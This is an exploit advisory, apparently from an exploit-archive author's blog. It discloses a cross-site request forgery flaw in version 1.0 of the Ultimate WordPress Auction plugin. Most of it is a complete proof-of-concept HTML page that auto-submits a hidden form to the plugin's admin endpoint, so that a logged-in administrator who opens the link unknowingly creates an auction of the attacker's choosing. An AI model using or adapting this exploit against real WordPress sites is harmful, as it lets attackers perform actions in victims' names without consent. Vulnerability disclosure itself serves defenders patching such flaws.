=============================================================
__ __ _ ___ _ __ ____
\ \ / / | | / _ \ (_) /_ | |___ \
___ \ V / _ __ | | | | | | _ | | __) | _ __
/ _ \ > < | '_ \ | | | | | | | | | | |__ < | '__|
| __/ / . \ | |_) | | | | |_| | | | | | ___) | | |
\___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_|
| |
|_| blackpentesters.blogspot.com
=============================================================
##############################################################################
# Exploit Title: [ Ultimate WordPress Auction v1.0 Plugin CSRF Vulnerability ]
# Date: [2013-6-15]
# Exploit Author: [expl0i13r]
# Vendor Homepage: [http://wordpress.org/plugins/ultimate-auction/]
# Software Link: [http://downloads.wordpress.org/plugin/ultimate-auction.zip]
# Version: [1.0]
# Tested on: [Wordpress 3.5.1 (Windows)]
# Contact: expl0i13r@gmail.com
##############################################################################
1. Plugin Description:
========================
The Ultimate WordPress Auction plugin allows easy and quick way to set up a professional auction website in ebay style.
2. Vulnerability Description:
==============================
This wordpress plugin "Ultimate WordPress Auction 1.0" suffers from CSRF vulnerability which can be successfully exploited by attacker to add Fake Auction Bids.
Affected URL:
--------------
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction
eXpl0it code:
--------------
<html>
<head>
<script type="text/javascript" language="javascript">
function submitform()
{
document.getElementById('myForm').submit();
}
</script>
</head>
<body>
<form name="myForm" id="wdm-add-auction-form" class="auction_settings_section_style" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=add-new-auction" method="POST" novalidate="novalidate">
Link: http://blackpentesters.blogspot.in/
Title:
<input name="auction_title" type="text" id="auction_title" class="regular-text valid" value="expl0iter">
Description:
<textarea name="auction_description" type="text" id="auction_description" cols="50" rows="10" class="large-text code valid"></textarea>
<input name="opening_bid" type="text" id="opening_bid" class="small-text number" min="0" value="">
<input name="lowest_bid" type="text" id="lowest_bid" class="small-text number" min="0" value="">
<input name="incremental_value" type="text" id="incremental_value" class="small-text number" min="0" value="">
<input name="end_date" type="text" id="end_date" class="regular-text hasDatepicker" readonly="" value="2013-07-10 00:00:00">
<input name="buy_it_now_price" type="text" id="buy_it_now_price" class="small-text number" min="1" value="">
<input type="submit" name="submit" id="submit" class="button button-primary" value="Save Changes">
</form>
<script type="text/javascript" language="javascript">
document.myForm.submit()
</script>
</body>
</html>
Once victim clicks on this link new auction of attackers choice will be added.(provided victim logged in to wordpress)
##################################
# eXpl0i13r #
# ------------------------------ #
#|blackpentesters.blogspot.com |#
#|infotech-knowledge.blogspot.in|#
# ------------------------------ #
##################################
